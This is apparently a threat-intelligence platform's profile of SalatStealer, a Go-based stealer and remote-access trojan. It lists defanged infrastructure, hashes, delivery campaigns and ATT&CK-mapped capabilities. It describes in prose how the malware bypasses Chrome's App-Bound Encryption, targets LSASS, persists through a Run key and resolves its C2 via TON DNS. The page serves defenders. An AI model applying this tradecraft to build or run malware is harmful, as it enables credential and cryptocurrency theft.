SALATSTEALER
SalatStealer is a Go-based Windows malware family, often described as a malware-as-a-service (MaaS) stealer, that combines broad information-stealing functionality with full remote-access trojan capabilities. Multiple reports describe it as a PE32 executable, frequently UPX-packed or using fake UPX section names, with encrypted configuration data and runtime C2 resolution. It has been linked to the NyashTeam/WebRat operation, a Russian-speaking MaaS group active since at least 2022, which marketed the malware via nyash[.]team and Telegram channels and used infrastructure including salat[.]cn, salator[.]es, websalat[.]top, sa1at[.]ru, wrat[.]in, webrat[.]ru, and webrat[.]top. Backend infrastructure was observed on Beget LLC-hosted servers in Russia, including 85.198.98.75 and 217.26.28.234, and additional linked infrastructure included 85.117.234.216 and 157.22.174.200.
SalatStealer targets browser credentials, cookies, login databases, web data, local state files, authentication tokens, browser sessions, and cryptocurrency wallets. Reported targeting includes more than 28-30 Chromium-based browsers, 6+ Gecko-based browsers, more than 24-28 cryptocurrency wallet applications, and 62 Chrome extension IDs associated with wallet extensions. Named targets include Chrome, Edge, Brave, Opera, Vivaldi, Yandex, Chromium, Firefox, Waterfox, SeaMonkey, Thunderbird, MetaMask, Phantom, Electrum, Coinbase, Binance Wallet, TonKeeper, MyTonWallet, AtomicWallet, Jaxx Liberty, TerraStation, Trust Wallet, Coinomi, and MyMonero. It also steals Telegram Desktop tdata, Discord tokens, Steam files such as config.vdf and SteamTokens.txt, clipboard contents including cryptocurrency addresses and tg:// URLs, screenshots, and keylogger output.
Beyond infostealing, SalatStealer includes extensive RAT functionality. Reported capabilities include arbitrary command execution, interactive reverse shell access, screen capture and streaming, desktop recording, webcam capture, microphone capture, hidden desktop interaction, keylogging, file download, process control, task scheduling, SOCKS5 or P2P proxying, persistence, and self-deletion. Persistence has been observed via a Registry Run key under SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and one campaign specifically used a Run value named WindowsUpdateService pointing to %TMP%\svchost.exe. The malware also includes privilege escalation and credential-access features such as LSASS targeting, token theft, privilege adjustment, COM elevation abuse, DuplicateUserTokenFromSessionID, getSystemToken, NtQuerySystemHandles, and process unlocking via the Restart Manager API. It has been reported to abuse IElevator, IElevatorBrave, and IElevatorEdge COM interfaces to bypass Chromium App-Bound Encryption and decrypt browser secrets.
Its command-and-control design is intended to complicate detection and disruption. Reports state that SalatStealer encrypts its C2 domain in the binary and decrypts it at runtime, resolves infrastructure through DNS-over-HTTPS using Cloudflare, Google DNS, and 1.1.1.1 with fallback to the local resolver, and communicates over WebSocket on the /saat/ path over HTTPS with QUIC/HTTP3 support. A newer sample, yesamsevo.exe (SHA-256 8651bf3f8f38d547530e0dcdd89da904e14ee7bd87c05f5ff429038ba73013ef), added a previously undocumented mechanism to resolve its primary C2 through TON blockchain DNS using tonutils-go, with periodic re-resolution to support infrastructure rotation. Reported command strings include postOpen, /config, _gateway, shutdown, taskkill, and ConnectCache.
Observed delivery vectors vary by campaign. SalatStealer has been delivered through ClickFix-style social engineering using a fake Google Meet lure, where attackers relied on user-assisted execution and abused PowerShell and BITSAdmin rather than software exploitation; associated indicators included online-meet.com, 185.213.240.179, SHA-256 a7962ffda8cc0277c013ffd4bd4328e31aea8206b8379a0b574e05a5e5152812, and SHA-256 8a132e7dd4876c87b5c425db32291bd54a2f3a477c78ceb4d29f297867a150fa. It was also delivered in phishing campaigns targeting Ukrainian-speaking organizations via ZIP archives containing malicious LNK files that launched hidden PowerShell and fetched second-stage scripts from 195.10.205[.]65. CERT-UA reported SalatStealer use in UAC-0252 campaigns impersonating Ukrainian authorities and government institutions, including delivery via GitHub-hosted payloads and exploitation of the WinRAR vulnerability CVE-2025-8088 alongside SHADOWSNIFF and DEAFTICK. Related indicators from CERT-UA include main.exe SHA-256 c149a236ddf07fb96de1a893b8d09cdfdd2c28abfc4c3c17bb3ebd8c3c7b5cef, main.deupx.exe SHA-256 a4f1a6f8f5a407ea0113253b557a6dc75c35398edf21bbc5322c47ac1fd0b689, and network paths such as hXXps://salat[.]cn/sa1at/ and hXXps://salator[.]ru/sa1at/.
SalatStealer also appeared repeatedly as a payload in the Amadey botnet campaign tagged fbf543, which multiple analyses assessed as a pay-per-install distribution service. In that campaign, Amadey distributed more than 50-100 samples across 24 malware families, including Vidar, LummaStealer, QuasarRAT, XWorm, SantaStealer, RustyStealer, and SalatStealer, using infrastructure such as sys32[.]cc, qpgroup[.]top, and labinstalls[.]info at 158.94.211.222. Additional reporting noted that large trojanized-software campaigns using WinUpdateHelper.dll also delivered SalatStealer in some infections, alongside coin miners and Mesh Agent.
High-confidence sample hashes reported for SalatStealer include 8651bf3f8f38d547530e0dcdd89da904e14ee7bd87c05f5ff429038ba73013ef, ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756, 30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2, c149a236ddf07fb96de1a893b8d09cdfdd2c28abfc4c3c17bb3ebd8c3c7b5cef, and a4f1a6f8f5a407ea0113253b557a6dc75c35398edf21bbc5322c47ac1fd0b689. Overall, the reporting consistently characterizes SalatStealer as a commodity but feature-rich infostealer/RAT used in financially motivated campaigns, with notable use against Ukrainian targets and infrastructure overlaps pointing to Russian-speaking criminal operators.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
UAC-0252 Campaign (Jan--Feb 2026) SalatStealer was deployed alongside three other tools in a campaign targeting Ukraine, tracked as UAC-0252 ... Initial vector: CVE-2025-8088 (WinRAR path traversal) distributed via the PalachPro Telegram channel. | A fresh SalatStealer sample ( yesamsevo.exe ) ships with a previously undocumented capability: resolving its C2 server address via TON blockchain DNS using tonutils-go.
NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub: ... github[.]com/DExplo1ted/CVE-2025-12596-Exploit
NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub: ... github[.]com/h4xnz/CVE-2025-55234-POC
Campaign Context Distribution via Fake CVE PoCs (NyashTeam, Dec 2025 -- present) NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub: github[.]com/RedFoxNxploits/CVE-2025-10294-Poc github[.]com/FixingPhantom/CVE-2025-10294
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A fresh SalatStealer sample ( yesamsevo.exe ) ships with a previously undocumented capability: resolving its C2 server address via TON blockchain DNS using tonutils-go.
UAC-0252 EXE in archive (SalatStealer) Weak, different delivery entirely
Techniques & procedures
39 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 techniqueMITRE ATT&CK Mapping Tactic Technique ID Implementation Initial Access Phishing: Spearphishing Link T1566.002 Cracked software download links
Execution
4 techniquesOn execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
This campaign demonstrates how ClickFix-style social engineering continues to evolve through abuse of legitimate Windows tooling and user-assisted execution workflows.
Persistence
4 techniquesOn execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
MITRE ATT&CK Mapping Technique ID Implementation Modify Registry T1112 Registry Run key persistence, Defender exclusion bypass
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
Privilege Escalation
6 techniquesOn execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
MITRE ATT&CK Mapping Technique ID Implementation ... Process Injection T1055 WriteProcessMemory , SetWindowsHookEx
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
On execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
Privilege Escalation main.Elevate -- UAC bypass ... Collection hits ... then privilege escalation through IElevator COM, token duplication, and LSASS handle enumeration.
Stealth
7 techniquesthe threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
MITRE ATT&CK Mapping Technique ID Implementation ... Process Injection T1055 WriteProcessMemory , SetWindowsHookEx
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
Defense Impairment
1 techniqueCredential Access
8 techniquesmain.NtQuerySystemHandles -- Handle enumeration (LSASS targeting) main.findLsassProcess -- LSASS process location
main.runKeylogger -- Start capture main.keyPressCallback -- SetWindowsHookEx WH_KEYBOARD callback main.windowChangeCallback -- Active window change (context labeling)
Collection hits 34 browsers, 28 crypto wallets, Telegram/Discord/Steam tokens, keylogger with window context, screenshots, and clipboard.
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise.
MITRE ATT&CK Mapping Technique ID Implementation Credentials in Files T1552.001 Browser profile data, wallet files
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise.
Firefox gets parallel treatment through NSS master key derivation with ASN.1 PBE parsing, 3DES and AES decryption paths, and proper PKCS5 unpadding.
Chromium-based browsers get the full treatment: DPAPI master key decryption, AES-GCM cookie/password decryption, and -- critically -- a GetAppBoundKey function that bypasses Chrome v127+'s App-Bound Encryption via the IElevator COM interface.
Discovery
5 techniquesMITRE ATT&CK Mapping ... Process Discovery T1057 PROCESSENTRY32 enumeration
MITRE ATT&CK Mapping Technique ID Implementation System Information Discovery T1082 Win32_Processor , Win32_LogonSession , HWID
MITRE ATT&CK Mapping Technique ID Implementation Virtualization/Sandbox Evasion T1497 VirtualBox/VMware registry key checks, ACPI enumeration
The bc.exe filename observed in a second Triage submission suggests the binary is distributed under different names to affiliates. System language and location discovery TTPs in that submission indicate geo-targeting or geo-fencing behavior.
The bc.exe filename observed in a second Triage submission suggests the binary is distributed under different names to affiliates. System language and location discovery TTPs in that submission indicate geo-targeting or geo-fencing behavior.
Collection
6 techniquesMITRE ATT&CK Mapping Technique ID Implementation ... Data from Local System T1005 Wallet files, Telegram tdata, Steam configs
main.runKeylogger -- Start capture main.keyPressCallback -- SetWindowsHookEx WH_KEYBOARD callback main.windowChangeCallback -- Active window change (context labeling)
main.(*wsSess).ffdesktop -- Real-time screen streaming via ffmpeg
Collection hits 34 browsers, 28 crypto wallets, Telegram/Discord/Steam tokens, keylogger with window context, screenshots, and clipboard.
Capability Functions Method ... Microphone ffwmic , getMics ffmpeg
Command and Control
7 techniquesThe transport layer uses gorilla/websocket over HTTPS with QUIC/HTTP3 support (via quic-go). The C2 path is /saat/ with a WebSocket session protocol ( wsSess ) for bidirectional command execution.
Every infected host becomes a SOCKS5 proxy node: main.(*socks5Conn).Serve -- SOCKS5 server ... main.p2pSocks -- P2P SOCKS relay
The actual C2 connection uses WebSocket over TLS for command-and-control, and QUIC (HTTP/3) for bulk data exfiltration.
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
SalatStealer has been documented before ... The binary imports github.com/xssnick/tonutils-go v1.16.0 and implements two functions: main.tonResolve and main.tryTonResolve.
A tloop function implements a polling loop that periodically re-resolves via TON, meaning the operator can rotate infrastructure mid-campaign and all infected hosts will follow within one polling interval. This is Fast Flux DNS with the blockchain as the authoritative server.
The actual C2 connection uses WebSocket over TLS for command-and-control...
Exfiltration
1 techniqueExfiltration compresses to sent.zip , ships over WSS and QUIC.
IOCs tracked for this family
39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
14 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An information-stealing malware delivered via a ClickFix-style social engineering campaign that abuses legitimate Windows tools such as PowerShell and BITSAdmin. It targets browser data and cryptocurrency wallets to enable credential theft, session hijacking, and digital asset compromise.
An infostealer deployed in the UAC-0252 campaign impersonating Ukrainian government institutions and exploiting a WinRAR vulnerability.
An infostealer delivered as a final payload in some infections of the campaign.
A Go-based stealer and full-featured RAT that steals browser credentials, cookies, crypto wallets, Telegram/Discord/Steam tokens, captures screenshots, clipboard, webcam, microphone, and keystrokes, provides shell access and SOCKS5 proxying, and uses TON blockchain DNS with Cloudflare DoH fallback to resolve C2 before exfiltrating data over WebSocket and QUIC.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.